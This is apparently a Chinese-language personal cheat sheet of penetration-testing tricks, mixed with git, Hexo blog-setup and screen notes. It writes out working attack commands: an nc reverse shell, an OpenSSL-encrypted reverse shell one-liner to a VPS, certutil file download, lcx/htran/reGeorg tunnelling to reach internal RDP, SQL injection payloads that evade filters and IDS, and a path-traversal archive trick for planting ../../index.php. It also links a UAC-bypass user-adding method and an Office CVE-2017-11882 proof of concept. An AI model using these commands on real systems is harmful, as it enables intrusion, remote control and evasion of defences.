tips：记录一些记不住的套路

加用户

注册表 bypassUAC 加用户 https://www.t00ls.net/thread-43711-1-1.html #可以用在system权限无法添加用户的情况

cmd上传文件

cmd上传文件的N种方法 https://www.t00ls.net/articles-37253.html

1	certutil -urlcache -split -f https://www.baidu.com/img/bd_logo1.png D:\x.txt 自定义目录下载

Office漏洞

Word漏洞 CVE-2017-11882 POC https://www.t00ls.net/viewthread.php?tid=42734

office-vulnerability-cve-2017-11882 http://blog.hflsafe.cn/2017/11/22/office-vulnerability-cve-2017-11882/

代码混淆

php代码混淆解析站：https://www.unphp.net

后渗透

域渗透

域渗透前置知识http://twi1ight.com/2016/04/basics-of-active-directory-hacking/#more

内网代理

突破防火墙和脚本限制建立代理隧道

利用 ew 轻松穿透目标多级内网

nc使用：
　　　　nc.exe -e cmd remoteIP Port
　　　　nc.exe -vv -lp Port
lcx使用：
　　　　lcx.exe -slave remoteIP RPort localIP Port
　　　　lcx.exe listen RPort LPort
htran
正向代理
服务端      htran.exe -s -bind 8888
客户端      SocksCap:SOCKS Version 5 服务端IP:8888

反向代理
客户端      htran.exe -s -listen 1234 8888
服务端      htran.exe -s -connect 客户端IP 1234
客户端      SocksCap:SOCKS Version 5 127.0.0.1:8888

正向端口转发
服务端      htran.exe -p -tran 8888 127.0.0.1 3389
客户端      RDP 服务端IP:8888

反向端口转发
客户端      htran.exe -p -listen 1234 8888
服务端      htran.exe -p -slave 客户端IP 1234 127.0.0.1 3389
客户端      RDP 127.0.0.1:8888
reGeo
python reGeorgSocksProxy.py -u http://targetURL/tunnel.nosocket.php -p 233

加密反弹shell

# 第一步，在vps上生成SSL证书的公钥/私钥对
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

# 第二步，在VPS监听反弹shell
openssl s_server -quiet -key key.pem -cert cert.pem -port 4433
# 第三步 在目标上用openssl加密反弹shell的流量
mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s

渗透测试

web全套资料干货满满各种文章详解

MSSQL不使用xp_cmdshell执行命令并获取回显的两种方法

WebLogic SSRF

状态1：IP存在&端口存在

状态2：端口不存在，ip不存在情况下也是这个

状态3：漏洞不存在

状态4：未知

状态5：未知

状态6：IP存在&端口存在，但端口非http协议

SQL注入中过滤了一些字符之后进行注入的方法：

 and Polygon(id) #爆表名
 #~ error:Illegal non geometric '`库名`.`当前页面连接的表名`.`所填字段名`' value found during parsing
 #这里的字段必须在这个表中存在 ，如注入点为?id=123则id存在几率较高。
 1-a(); #爆库名
 #~ error:FUNCTION 库名.a does not exist


 版本5.6.x以上可以用下面的表代替information_schema,
select * from mysql.innodb_table_stats;
select table_name from mysql.innodb_table_stats where database_name

绕过IDS过滤information_schema继续注入

git使用

git clone 地址
git add README.md
git commit -m "first commit"
git push -u origin master

git init
git remote add origin https://github.com/admintony/insert_update_injectionCode.git

删除指定文件：
git clone 地址
git rm -r --cached 文件名
git push -u origin master

python

最详细的python+selenium教程

重装系统后恢复博客

1.安装Git Bash

下载地址
安装步骤：双击下载好的EXE文件，一路next就好

2.安装NodeJs

下载地址（说明:LTS为长期支持版，Current为最新版）
安装步骤：下载好msi文件后，双击打开安装，也是一路next

3.安装hexo

在博客目录下执行npm i -g hexo

4.搭桥GitHub

配置gitbashgit config --global user.name "admintony" 和 git config --global user.email "78941695@qq.com"
创建公钥ssh-keygen -t rsa -C "78941695@qq.com" （注意：id_rsa默认目录，然后复制到blog目录下）
github添加公钥

测试连接ssh -T git@github.com

5.搜索插件

安装搜索插件：npm install hexo-generator-search --save && npm install hexo-generator-searchdb --save

6.安装字数统计插件

npm i --save hexo-wordcount

7.安装sitemap插件

npm install hexo-generator-sitemap --save-dev
npm install hexo-generator-baidu-sitemap --save-dev

8.安装置顶插件

npm uninstall hexo-generator-index --save
npm install hexo-generator-index-pin-top --save

9.自动推送

npm install hexo-baidu-url-submit --save

如何创建../../a.php的压缩包

创建一个名为aaaaaaindex.php的文件

之所以起这个名字，就是预留一些空间，方便我之后将文件名改成../../index.php，而不用怕字符串长度不对。

压缩为压缩文件并用notepad++打开

修改两处名称，并保存

把前面6个a替换成../../

Linux技巧

screen命令

1、screen 进入session
2、在session中按下：Ctrl+A 后再按D 回到主机器
3、screen -ls  查看session
4、screen -r xxxx   进入session

学无止境苦与乐

好文章收集

加用户